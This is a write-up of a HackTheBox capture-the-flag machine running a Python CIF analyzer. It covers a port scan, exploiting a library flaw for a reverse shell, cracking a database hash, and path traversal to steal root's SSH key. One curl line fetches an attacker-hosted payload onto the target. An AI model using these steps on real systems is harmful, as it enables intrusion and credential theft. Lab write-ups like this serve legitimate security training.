Hello Eveyone WE back again with HTB machine i really enjoy HTB machines recently.
Enumeration.
Port scan.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCj5eCYeJYXEGT5pQjRRX4cRr4gHoLUb/riyLfCAQMf40a6IO3BMzwyr3OnfkqZDlr6o9tS69YKDE9ZkWk01vsDM/T1k/m1ooeOaTRhx2Yene9paJnck8Stw4yVWtcq6PPYJA3HxkKeKyAnIVuYBvaPNsm+K5+rsafUEc5FtyEGlEG0YRmyk/NepEFU6qz25S3oqLLgh9Ngz4oGeLudpXOhD4gN6aHnXXUHOXJgXdtY9EgNBfd8paWTnjtloAYi4+ccdMfxO7PcDOxt5SQan1siIkFq/uONyV+nldyS3lLOVUCHD7bXuPemHVWqD2/1pJWf+PRAasCXgcUV+Je4fyNnJwec1yRCbY3qtlBbNjHDJ4p5XmnIkoUm7hWXAquebykLUwj7vaJ/V6L19J4NN8HcBsgcrRlPvRjXz0A2VagJYZV+FVhgdURiIM4ZA7DMzv9RgJCU2tNC4EyvCTAe0rAM2wj0vwYPPEiHL+xXHGSvsoZrjYt1tGHDQvy8fto5RQU=
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLzrl552bgToHASFlKHFsDGrkffR/uYDMLjHOoueMB9HeLRFRvZV5ghoTM3Td9LImvcLsqD84b5n90qy3peebL0=
| 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIELLgwg7A8Kh8AxmiUXeMe9h/wUnfdoruCJbWci81SSB
5000/tcp open upnp? syn-ack ttl 63
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Mon, 28 Oct 2024 12:54:13 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
| Vary: Cookie
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Chemistry - Home</title>
| <link rel="stylesheet" href="/static/styles.css">
| </head>
| <body>
| <div class="container">
| class="title">Chemistry CIF Analyzer</h1>
| <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
| <div class="buttons">
| <center><a href="/login" class="btn">Login</a>
| href="/register" class="btn">Register</a></center>
| </div>
| </div>
| </body>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
So we have an web page on 5000 which appears to run python 3.9.5 and SSH. Let's see what we have in the web.
So we have a login/Register page let's make account and see what it is all about.
So we can upload something called CIF what is CIF files ???.
CIF files, or Crystallographic Information Files, are standardized text-based files used to store and share crystallographic data, particularly in fields like chemistry, materials science, and structural biology. These files describe the structure and properties of crystalline materials, including atomic positions, symmetry, and unit cell parameters.
Okkkkk.
From there it just a matter of googling and you find the answer. 👻
OK. So the server running python and the exploit is in a python libary so am assuing this is what we looking for.
Navigating to this git repo we can see a POC to test.
So i make it fetch my server to see if it exploiable or not.
And indded.
Getting Shell.
So i decide to upload file into the server. which contain reverse shell.
The file name was bash.sh as in the exploit file but it keep adding this * so i added it into the file name.
The command i used to upload into the server was
curl http://<IP>:<PORT>/<FILENAME> -o <FILENAME>
And then i added executable permissions and then i ran the file each operation was in its own request. and i got a shell.
Getting Shell as Rosa (Password Reuse On The Top) .
So to access Rosa's shell. First i look in her home directory since we have read permission. But there was nothing there just an intresting script but was not good. i tried to forward port 8080 but there was nothing. It turns out to be simpler than i think i view the app.py and i find that it uses sqlite db we can find it here.
I upload this into my machine.
So i take that password and i tried to crack it.
Using.
After that i created ssh key to make things easier.
And copy the private key into your machine.
Shell as Root.
From here things are simple we see that rosa give us a hint in her exploit.sh and 1.sh we can see that she tries to prefom path traversal afte the endpoint /assets. So i use port forward from SSH.
And i used burpsuit. to check it.
From rosa exploit we can see that the root has id_rsa. so i tried to access it.
And we can login as root using this key. and copy the SSH key and change its premissions. and login using it.
